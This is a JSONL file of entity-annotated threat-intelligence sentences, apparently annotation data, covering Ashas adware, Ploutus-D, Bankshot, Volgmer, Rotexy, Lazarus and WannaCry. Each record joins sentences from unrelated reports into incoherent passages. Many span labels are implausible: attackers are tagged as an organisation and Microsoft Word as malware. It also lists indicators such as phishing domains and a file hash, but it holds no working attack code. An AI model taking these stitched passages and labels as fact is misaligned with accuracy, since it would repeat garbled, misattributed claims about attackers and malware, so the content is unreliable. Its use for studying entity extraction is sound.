{"text": "We were able to see that his recently visited web sites were Google Play pages belonging to apps containing the Ashas adware . Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits \u2013 4 digits) and the number of cycles (billCount \u2013 2 digits) to repeat the dispensing operation (see Figure 10) . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": [{"start": 61, "end": 72, "label": "System"}, {"start": 112, "end": 124, "label": "Malware"}, {"start": 127, "end": 136, "label": "Malware"}, {"start": 153, "end": 162, "label": "Organization"}, {"start": 458, "end": 463, "label": "System"}, {"start": 466, "end": 479, "label": "Vulnerability"}, {"start": 482, "end": 495, "label": "Vulnerability"}, {"start": 502, "end": 515, "label": "Vulnerability"}]}
{"text": "He also used his email account to log into various services in the video , which identifies him as the adware domain owner , beyond any doubt . Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system .", "spans": [{"start": 144, "end": 153, "label": "Malware"}, {"start": 226, "end": 244, "label": "Malware"}, {"start": 367, "end": 379, "label": "Organization"}, {"start": 383, "end": 391, "label": "Malware"}, {"start": 392, "end": 399, "label": "Malware"}]}
{"text": "Thanks to the video , we were even able to identify three further apps that contained adware functionality and were available on Google Play . Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide . In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 .", "spans": [{"start": 129, "end": 140, "label": "System"}, {"start": 149, "end": 158, "label": "Malware"}, {"start": 231, "end": 240, "label": "Malware"}, {"start": 282, "end": 293, "label": "Organization"}, {"start": 363, "end": 371, "label": "Malware"}]}
{"text": "Figure 14 . The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process . This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT .", "spans": [{"start": 23, "end": 29, "label": "Organization"}, {"start": 146, "end": 158, "label": "Malware"}, {"start": 211, "end": 223, "label": "Organization"}]}
{"text": "Screenshots from this developer \u2019 s YouTube video shows history of checking Ashas adware on Google Play ESET telemetry Figure 15 . The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant .", "spans": [{"start": 36, "end": 43, "label": "System"}, {"start": 76, "end": 81, "label": "Malware"}, {"start": 92, "end": 103, "label": "System"}, {"start": 104, "end": 108, "label": "Organization"}, {"start": 135, "end": 147, "label": "Malware"}, {"start": 252, "end": 260, "label": "Malware"}, {"start": 282, "end": 289, "label": "Vulnerability"}, {"start": 317, "end": 330, "label": "Vulnerability"}, {"start": 343, "end": 351, "label": "Organization"}]}
{"text": "ESET detections of Android/AdDisplay.Ashas on Android devices by country Is adware harmful ? We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file . These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 19, "end": 42, "label": "Malware"}, {"start": 163, "end": 175, "label": "Malware"}, {"start": 238, "end": 246, "label": "Malware"}, {"start": 299, "end": 307, "label": "Malware"}, {"start": 345, "end": 353, "label": "Organization"}]}
{"text": "Because the real nature of apps containing adware is usually hidden to the user , these apps and their developers should be considered untrustworthy . There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet . Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants .", "spans": [{"start": 237, "end": 248, "label": "Malware"}, {"start": 267, "end": 280, "label": "Malware"}, {"start": 281, "end": 287, "label": "Malware"}, {"start": 290, "end": 298, "label": "Malware"}, {"start": 325, "end": 356, "label": "Organization"}]}
{"text": "When installed on a device , apps containing adware may , among other things : Annoy users with intrusive advertisements , including scam ads Waste the device \u2019 s battery resources Generate increased network traffic Gather users \u2019 personal information Hide their presence on the affected device to achieve persistence Generate revenue for their operator without any user interaction Conclusion Based solely on open source intelligence , we were able to trace the developer of the Ashas adware and establish his identity and discover additional related adware-infected apps . Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on . We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) .", "spans": [{"start": 480, "end": 485, "label": "Malware"}, {"start": 575, "end": 583, "label": "Malware"}, {"start": 676, "end": 685, "label": "Malware"}, {"start": 807, "end": 830, "label": "Organization"}]}
{"text": "Seeing that the developer did not take any measures to protect his identity , it seems likely that his intentions weren \u2019 t dishonest at first \u2013 and this is also supported by the fact that not all his published apps contained unwanted ads . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": [{"start": 241, "end": 251, "label": "System"}, {"start": 322, "end": 330, "label": "System"}, {"start": 339, "end": 352, "label": "Malware"}, {"start": 415, "end": 424, "label": "Indicator"}, {"start": 434, "end": 439, "label": "System"}, {"start": 440, "end": 447, "label": "Vulnerability"}, {"start": 509, "end": 516, "label": "Vulnerability"}, {"start": 520, "end": 530, "label": "System"}]}
{"text": "At some point in his Google Play \u201c career \u201d , he apparently decided to increase his ad revenue by implementing adware functionality in his apps \u2019 code . One of them \u2013 ipv4.dll \u2013 has been placed by the APT with what is , in fact , a downloader for other malicious components . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": [{"start": 21, "end": 32, "label": "System"}, {"start": 167, "end": 175, "label": "Malware"}, {"start": 232, "end": 242, "label": "System"}, {"start": 321, "end": 351, "label": "Indicator"}, {"start": 370, "end": 390, "label": "Malware"}, {"start": 393, "end": 396, "label": "Malware"}]}
{"text": "The various stealth and resilience techniques implemented in the adware show us that the culprit was aware of the malicious nature of the added functionality and attempted to keep it hidden . Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data .", "spans": [{"start": 221, "end": 236, "label": "Malware"}, {"start": 237, "end": 257, "label": "Malware"}, {"start": 340, "end": 369, "label": "Malware"}]}
{"text": "Sneaking unwanted or harmful functionality into popular , benign apps is a common practice among \u201c bad \u201d developers , and we are committed to tracking down such apps . First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan . Volgmer is a backdoor Trojan designed to provide covert access to a compromised system .", "spans": [{"start": 231, "end": 236, "label": "Malware"}, {"start": 251, "end": 265, "label": "System"}, {"start": 268, "end": 275, "label": "Malware"}, {"start": 281, "end": 296, "label": "Malware"}]}
{"text": "We report them to Google and take other steps to disrupt malicious campaigns we discover . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system .", "spans": [{"start": 18, "end": 24, "label": "Organization"}, {"start": 119, "end": 139, "label": "Organization"}, {"start": 181, "end": 214, "label": "Malware"}, {"start": 234, "end": 247, "label": "Vulnerability"}, {"start": 366, "end": 373, "label": "Malware"}, {"start": 397, "end": 416, "label": "Organization"}, {"start": 432, "end": 444, "label": "Malware"}]}
{"text": "Last but not least , we publish our findings to help Android users protect themselves . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries .", "spans": [{"start": 53, "end": 60, "label": "System"}, {"start": 167, "end": 180, "label": "Vulnerability"}, {"start": 192, "end": 206, "label": "Malware"}, {"start": 231, "end": 250, "label": "Organization"}, {"start": 276, "end": 283, "label": "Malware"}, {"start": 284, "end": 291, "label": "Malware"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 331, "end": 340, "label": "Organization"}, {"start": 343, "end": 353, "label": "Organization"}, {"start": 360, "end": 376, "label": "Organization"}]}
{"text": "MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast , ensuring that the app 's functionality will be activated every time the device starts Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads The Rotexy mobile Trojan \u2013 banker and ransomware 22 NOV 2018 On Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image . Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 169, "end": 180, "label": "System"}, {"start": 491, "end": 497, "label": "Malware"}, {"start": 551, "end": 559, "label": "Organization"}, {"start": 594, "end": 601, "label": "System"}, {"start": 619, "end": 632, "label": "Malware"}, {"start": 636, "end": 645, "label": "Malware"}, {"start": 732, "end": 752, "label": "Malware"}, {"start": 811, "end": 818, "label": "Malware"}]}
{"text": "the back of a surge in Trojan activity , we decided to carry out an in-depth analysis and track the evolution of some other popular malware families besides Asacub . CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos . As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories .", "spans": [{"start": 157, "end": 163, "label": "Malware"}, {"start": 166, "end": 172, "label": "Malware"}, {"start": 234, "end": 239, "label": "System"}, {"start": 244, "end": 250, "label": "System"}, {"start": 383, "end": 398, "label": "Malware"}, {"start": 401, "end": 408, "label": "Malware"}]}
{"text": "One of the most interesting and active specimens to date was a mobile Trojan from the Rotexy family . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": [{"start": 86, "end": 92, "label": "Malware"}, {"start": 111, "end": 126, "label": "System"}, {"start": 167, "end": 176, "label": "Organization"}, {"start": 203, "end": 213, "label": "Malware"}, {"start": 333, "end": 359, "label": "Organization"}, {"start": 369, "end": 386, "label": "Indicator"}]}
{"text": "In a three-month period from August to October 2018 , it launched over 70,000 attacks against users located primarily in Russia . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": [{"start": 140, "end": 145, "label": "Organization"}, {"start": 244, "end": 255, "label": "Malware"}, {"start": 315, "end": 323, "label": "Organization"}, {"start": 344, "end": 351, "label": "Malware"}, {"start": 420, "end": 440, "label": "System"}, {"start": 443, "end": 447, "label": "Indicator"}]}
{"text": "An interesting feature of this family of banking Trojans is the simultaneous use of three command sources : Google Cloud Messaging ( GCM ) service \u2013 used to send small messages in JSON format to a mobile device via Google servers ; malicious C & C server ; incoming SMS messages . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service .", "spans": [{"start": 291, "end": 296, "label": "Organization"}, {"start": 395, "end": 406, "label": "Malware"}, {"start": 411, "end": 425, "label": "Organization"}]}
{"text": "This \u2018 versatility \u2019 was present in the first version of Rotexy and has been a feature of all the family \u2019 s subsequent representatives . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL .", "spans": [{"start": 57, "end": 63, "label": "Malware"}, {"start": 168, "end": 173, "label": "Organization"}, {"start": 201, "end": 213, "label": "Organization"}, {"start": 233, "end": 254, "label": "Organization"}, {"start": 263, "end": 277, "label": "Malware"}, {"start": 350, "end": 371, "label": "Organization"}, {"start": 387, "end": 402, "label": "Organization"}, {"start": 414, "end": 417, "label": "Organization"}, {"start": 422, "end": 425, "label": "Organization"}, {"start": 437, "end": 443, "label": "Malware"}, {"start": 444, "end": 451, "label": "Malware"}, {"start": 518, "end": 533, "label": "Organization"}]}
{"text": "During our research we also arrived at the conclusion that this Trojan evolved from an SMS spyware Trojan that was first spotted in October 2014 . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies . The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP PROT 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 249, "end": 263, "label": "Malware"}, {"start": 337, "end": 359, "label": "Malware"}, {"start": 363, "end": 369, "label": "Malware"}, {"start": 404, "end": 406, "label": "System"}, {"start": 428, "end": 431, "label": "Indicator"}, {"start": 484, "end": 503, "label": "Indicator"}, {"start": 506, "end": 509, "label": "Indicator"}, {"start": 536, "end": 550, "label": "Organization"}]}
{"text": "Back then it was detected as Trojan-Spy.AndroidOS.SmsThief , but later versions were assigned to another family \u2013 Trojan-Banker.AndroidOS.Rotexy . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity .", "spans": [{"start": 29, "end": 58, "label": "Malware"}, {"start": 114, "end": 144, "label": "Malware"}, {"start": 157, "end": 170, "label": "Organization"}, {"start": 251, "end": 266, "label": "Malware"}, {"start": 307, "end": 310, "label": "Organization"}, {"start": 315, "end": 318, "label": "Organization"}]}
{"text": "The modern version of Rotexy combines the functions of a banking Trojan and ransomware . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 \u2014 at least based on the file properties of the decoy documents they've been sending to their targets . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 99, "end": 112, "label": "Organization"}, {"start": 223, "end": 238, "label": "Malware"}, {"start": 300, "end": 308, "label": "Malware"}, {"start": 339, "end": 346, "label": "Organization"}]}
{"text": "It spreads under the name AvitoPay.apk ( or similar ) and downloads from websites with names like youla9d6h.tk , prodam8n9.tk , prodamfkz.ml , avitoe0ys.tk , etc . Carbanak is a backdoor used by the attackers to compromise the victim . We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL\u2013A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form\u2014a version that other researchers also recently identified .", "spans": [{"start": 26, "end": 38, "label": "Indicator"}, {"start": 98, "end": 110, "label": "Indicator"}, {"start": 113, "end": 125, "label": "Indicator"}, {"start": 128, "end": 140, "label": "Indicator"}, {"start": 143, "end": 155, "label": "Indicator"}, {"start": 164, "end": 172, "label": "Malware"}, {"start": 178, "end": 186, "label": "System"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 254, "end": 262, "label": "Malware"}, {"start": 273, "end": 293, "label": "Malware"}, {"start": 336, "end": 353, "label": "Malware"}]}
{"text": "These website names are generated according to a clear algorithm : the first few letters are suggestive of popular classified ad services , followed by a random string of characters , followed by a two-letter top-level domain . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . Around 55% of the victims of Lazarus were located in India and neighboring countries .", "spans": [{"start": 292, "end": 316, "label": "Malware"}, {"start": 328, "end": 341, "label": "Vulnerability"}, {"start": 373, "end": 380, "label": "Organization"}]}
{"text": "But before we go into the details of what the latest version of Rotexy can do and why it \u2019 s distinctive , we would like to give a summary of the path the Trojan has taken since 2014 up to the present day . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee . Lazarus group could have been active since late 2016 , was used in a recent campaign targeting financial institutions using watering hole attacks .", "spans": [{"start": 64, "end": 70, "label": "Malware"}, {"start": 227, "end": 240, "label": "System"}, {"start": 241, "end": 251, "label": "Malware"}, {"start": 321, "end": 329, "label": "Organization"}, {"start": 332, "end": 345, "label": "Organization"}, {"start": 427, "end": 449, "label": "Organization"}]}
{"text": "Evolution of Rotexy 2014\u20132015 Since the malicious program was detected in 2014 , its main functions and propagation method have not changed : Rotexy spreads via links sent in phishing SMSs that prompt the user to install an app . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics . Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks\u2014such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank\u2014in recent history .", "spans": [{"start": 13, "end": 19, "label": "Malware"}, {"start": 142, "end": 148, "label": "Malware"}, {"start": 354, "end": 360, "label": "System"}, {"start": 389, "end": 413, "label": "Malware"}, {"start": 581, "end": 591, "label": "Organization"}, {"start": 607, "end": 613, "label": "Organization"}]}
{"text": "As it launches , it requests device administrator rights , and then starts communicating with its C & C server . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . It 's possible that Lazarus is using RATANKBA to target larger organizations .", "spans": [{"start": 113, "end": 121, "label": "Organization"}, {"start": 143, "end": 170, "label": "Vulnerability"}, {"start": 173, "end": 186, "label": "Vulnerability"}, {"start": 232, "end": 246, "label": "Malware"}, {"start": 249, "end": 262, "label": "Vulnerability"}, {"start": 269, "end": 285, "label": "System"}, {"start": 288, "end": 301, "label": "Vulnerability"}, {"start": 326, "end": 333, "label": "Organization"}, {"start": 343, "end": 351, "label": "Malware"}]}
{"text": "Until mid-2015 , Rotexy used a plain-text JSON format to communicate with its C & C . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa . RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders .", "spans": [{"start": 17, "end": 23, "label": "Malware"}, {"start": 100, "end": 109, "label": "Malware"}, {"start": 122, "end": 130, "label": "System"}, {"start": 159, "end": 167, "label": "Malware"}, {"start": 242, "end": 268, "label": "Malware"}, {"start": 281, "end": 290, "label": "Malware"}]}
{"text": "The C & C address was specified in the code and was also unencrypted : In some versions , a dynamically generated low-level domain was used as an address : In its first communication , the Trojan sent the infected device \u2019 s IMEI to the C & C , and in return it received a set of rules for processing incoming SMSs ( phone numbers , keywords and regular expressions ) \u2013 these applied mainly to messages from banks , payment systems and mobile network operators . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses .", "spans": [{"start": 477, "end": 486, "label": "Malware"}, {"start": 495, "end": 507, "label": "Organization"}, {"start": 530, "end": 539, "label": "System"}, {"start": 616, "end": 623, "label": "Organization"}, {"start": 642, "end": 648, "label": "Organization"}, {"start": 665, "end": 679, "label": "Organization"}]}
{"text": "For instance , the Trojan could automatically reply to an SMS and immediately delete it . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . simultaneous use of the detected Win32/KillDisk.NBO variants .", "spans": [{"start": 94, "end": 125, "label": "Organization"}, {"start": 163, "end": 185, "label": "Malware"}, {"start": 256, "end": 274, "label": "Malware"}]}
{"text": "Rotexy then sent information about the smartphone to the C & C , including the phone model , number , name of the mobile network operator , versions of the operating system and IMEI . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government \u2013 commonly known as HARDRAIN .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 198, "end": 207, "label": "Malware"}, {"start": 216, "end": 228, "label": "Organization"}, {"start": 251, "end": 260, "label": "System"}, {"start": 276, "end": 291, "label": "Organization"}, {"start": 303, "end": 306, "label": "Organization"}, {"start": 311, "end": 314, "label": "Organization"}, {"start": 326, "end": 332, "label": "Malware"}, {"start": 333, "end": 340, "label": "Malware"}, {"start": 406, "end": 414, "label": "Malware"}]}
{"text": "With each subsequent request , a new subdomain was generated . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections .", "spans": [{"start": 67, "end": 98, "label": "Organization"}, {"start": 136, "end": 158, "label": "Malware"}, {"start": 304, "end": 308, "label": "Malware"}, {"start": 346, "end": 348, "label": "System"}]}
{"text": "The algorithm for generating the lowest-level domain name was hardwired in the Trojan \u2019 s code . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America .", "spans": [{"start": 97, "end": 106, "label": "Malware"}, {"start": 116, "end": 129, "label": "Vulnerability"}, {"start": 239, "end": 246, "label": "Organization"}, {"start": 274, "end": 297, "label": "Organization"}]}
{"text": "The Trojan also registered in Google Cloud Messaging ( GCM ) , meaning it could then receive commands via that service . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) . We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America .", "spans": [{"start": 30, "end": 60, "label": "System"}, {"start": 166, "end": 196, "label": "Malware"}, {"start": 215, "end": 235, "label": "System"}, {"start": 238, "end": 241, "label": "System"}, {"start": 279, "end": 286, "label": "Organization"}, {"start": 337, "end": 348, "label": "Organization"}, {"start": 352, "end": 371, "label": "Malware"}, {"start": 399, "end": 421, "label": "Organization"}]}
{"text": "The Trojan \u2019 s list of possible commands has remained practically unchanged throughout its life , and will be described below in detail . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component .", "spans": [{"start": 188, "end": 214, "label": "Organization"}, {"start": 224, "end": 241, "label": "Malware"}]}
{"text": "The Trojan \u2019 s assets folder contained the file data.db with a list of possible values for the User-Agent field for the PAGE command ( which downloads the specified webpage ) . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll ) Just last week Lazarus were found stealing millions from ATMs across Asia and Africa .", "spans": [{"start": 48, "end": 55, "label": "Indicator"}, {"start": 177, "end": 184, "label": "System"}, {"start": 276, "end": 280, "label": "Malware"}, {"start": 298, "end": 305, "label": "Organization"}]}
{"text": "If the value of this field failed to arrive from the C & C , it was selected from the file data.db using a pseudo-random algorithm . Trend Micro endpoint solutions such as Trend Micro\u2122 Smart Protection Suites and Worry-Free\u2122 Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs . These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization .", "spans": [{"start": 91, "end": 98, "label": "Indicator"}, {"start": 133, "end": 144, "label": "Organization"}, {"start": 172, "end": 208, "label": "Organization"}, {"start": 213, "end": 242, "label": "Organization"}, {"start": 265, "end": 275, "label": "Organization"}, {"start": 308, "end": 323, "label": "Malware"}, {"start": 428, "end": 441, "label": "Organization"}]}
{"text": "2015\u20132016 Starting from mid-2015 , the Trojan began using the AES algorithm to encrypt data communicated between the infected device and the C & C : Also starting with the same version , data is sent in a POST request to the relative address with the format \u201c / [ number ] \u201d ( a pseudo-randomly generated number in the range 0\u20139999 ) . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more .", "spans": [{"start": 336, "end": 344, "label": "System"}, {"start": 383, "end": 388, "label": "Malware"}, {"start": 401, "end": 436, "label": "Malware"}, {"start": 520, "end": 527, "label": "Organization"}, {"start": 622, "end": 633, "label": "Organization"}, {"start": 645, "end": 654, "label": "Organization"}]}
{"text": "In some samples , starting from January 2016 , an algorithm has been implemented for unpacking the encrypted executable DEX file from the assets folder . Some of the documents exploited CVE-2017-0199 to deliver the payload . Trend Micro endpoint solutions such as Trend Micro\u2122 Smart Protection Suites and Worry-Free\u2122 Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs .", "spans": [{"start": 166, "end": 175, "label": "Malware"}, {"start": 186, "end": 199, "label": "Vulnerability"}, {"start": 203, "end": 222, "label": "Malware"}, {"start": 225, "end": 236, "label": "Organization"}, {"start": 264, "end": 300, "label": "Organization"}, {"start": 305, "end": 334, "label": "Organization"}, {"start": 357, "end": 367, "label": "Organization"}, {"start": 400, "end": 415, "label": "Indicator"}]}
{"text": "In this version of Rotexy , dynamic generation of lowest-level domains was not used . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period . FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation .", "spans": [{"start": 19, "end": 25, "label": "Malware"}, {"start": 90, "end": 99, "label": "Organization"}, {"start": 123, "end": 159, "label": "Malware"}, {"start": 192, "end": 217, "label": "Organization"}, {"start": 239, "end": 242, "label": "Organization"}, {"start": 268, "end": 287, "label": "Organization"}]}
{"text": "2016 From mid-2016 on , the cybercriminals returned to dynamic generation of lowest-level domains . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": [{"start": 124, "end": 145, "label": "Malware"}, {"start": 169, "end": 178, "label": "Malware"}, {"start": 239, "end": 244, "label": "System"}, {"start": 247, "end": 257, "label": "Malware"}, {"start": 381, "end": 389, "label": "Malware"}, {"start": 396, "end": 400, "label": "Malware"}, {"start": 408, "end": 419, "label": "Malware"}, {"start": 597, "end": 615, "label": "Organization"}, {"start": 618, "end": 626, "label": "Organization"}, {"start": 629, "end": 646, "label": "Organization"}, {"start": 649, "end": 661, "label": "Organization"}, {"start": 666, "end": 688, "label": "Organization"}]}
{"text": "No other significant changes were observed in the Trojan \u2019 s network behavior . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": [{"start": 101, "end": 125, "label": "Malware"}, {"start": 154, "end": 218, "label": "Vulnerability"}, {"start": 230, "end": 243, "label": "Vulnerability"}, {"start": 288, "end": 296, "label": "Malware"}, {"start": 303, "end": 307, "label": "Malware"}, {"start": 315, "end": 326, "label": "Malware"}, {"start": 504, "end": 522, "label": "Organization"}, {"start": 525, "end": 533, "label": "Organization"}, {"start": 536, "end": 553, "label": "Organization"}, {"start": 556, "end": 568, "label": "Organization"}, {"start": 573, "end": 595, "label": "Organization"}]}
{"text": "In late 2016 , versions of the Trojan emerged that contained the card.html phishing page in the assets/www folder . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys . We also saw that the attack technique bears some resemblance to a previous 2017 Lazarus attack , analyzed by BAE Systems , against targets in Asia .", "spans": [{"start": 65, "end": 74, "label": "Indicator"}, {"start": 96, "end": 106, "label": "Indicator"}, {"start": 170, "end": 184, "label": "Malware"}, {"start": 243, "end": 272, "label": "Malware"}, {"start": 384, "end": 395, "label": "Organization"}]}
{"text": "The page was designed to steal users \u2019 bank card details : 2017\u20132018 From early 2017 , the HTML phishing pages bank.html , update.html and extortionist.html started appearing in the assets folder . The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system .", "spans": [{"start": 111, "end": 120, "label": "Indicator"}, {"start": 123, "end": 134, "label": "Indicator"}, {"start": 139, "end": 156, "label": "Indicator"}, {"start": 251, "end": 265, "label": "System"}, {"start": 293, "end": 310, "label": "Malware"}, {"start": 313, "end": 321, "label": "Malware"}, {"start": 331, "end": 342, "label": "Vulnerability"}, {"start": 364, "end": 367, "label": "Malware"}]}
